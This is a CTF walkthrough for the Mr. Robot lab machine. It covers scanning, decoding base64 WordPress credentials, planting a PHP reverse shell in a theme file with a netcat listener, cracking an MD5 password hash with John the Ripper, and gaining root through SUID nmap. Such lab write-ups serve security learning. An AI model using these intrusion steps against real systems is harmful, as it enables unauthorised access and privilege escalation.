Mr Robot CTF
Based on the Mr. Robot show, can you root this box?
Room link is here link
Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
Let’s start the room with basic things.
nmap -sV -sC -A IP
- Port 22 – SSH
- Port 80 – http
- Port 443 – ssl/http
Now, let's check out the webserver!
With the commands displayed here you can’t do anything which that would be help you.
If you haven’t seen the show yet, I recommend you do not try these commands, as they contain spoilers!
On this page we don’t have any information to help us, so I decided to do a gobuster scan ( directory search ).
gobuster dir -u IP -w /usr/share/wordlists/dirb/common.txt
The first hint for the first question is “Robots”
And we have the directory “robots.txt”
Here is the first KEY!
From this point I've found 2 ways to find the next key:
From the gobuster scan, we found a wordpress admin login page and on /robots.txt is a file “fsocity.dic” -> is a wordlist which we can use to bruteforce wordpress login page (This is a waste of time)
There is another interesting directory -> /license
If we scroll down we find a string in base64
We can decode this on BASE64 DECODER
https://base64.guru/converter/decode/text
ZWxsaW90OkVSMjgtMDY1Mgo= --> elliot:ER28-0652
And easy, we have the credentials for wordpress:
Now the tricky part, and my favourite part of this room
We need to do a reverse shell:
First go to “Appearance” – “Editor” – “Archives”
At this step, we have to replace the code that comes up with the reverse php shell component that we can copy from Github.
PHP REVERSE SHELL
To connect to the shell you have to listen the port 4444 ( or the port you have chosen )
NETCAT
nc -lvnp 4444
And go on IP/wp-content/themes/twentyfifteen/archive.php
to activate the shell.
I added:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py
to have a stable shell.
The second key is in /home/robot/, but unfortunately we dont have permission to read this.
Luckily there is another file with the password for robot user.
To decrypt this hash we use JohnTheRipper.
echo 'c3fcd3d76192e4007dfb496cca67e13b' > anyfilename
john --format=raw-md5 --wordlist=rockyou.txt anyfilename
john --show --format=RAW-MD5 anyfilename
> ?: abcdefghijklmnopqrstuvwxyz (this is the password)
Now, simply conenct as "robot".
su robot
-and the password is **abcdefghijklmnopqrstuvwxyz**
Now it remains to find the last key that should be in root.
The hint is NMAP
I used
find / -perm -u=s -type f 2>/dev/null
to find all files who have SUID bit set.
GTFOBINS is the best site in my opinion to find how to get root privilege access
LINK
These are the comamnds to obtain root access:
nmap --interactive
nmap> !sh
Finally we found the final key!!!
It's a pretty old challenge, but a very good one. I hope you learned a lot from this writeup.
For any queries, feel free to drop a comment and follow me here for more ctf writeups.
Top comments (0)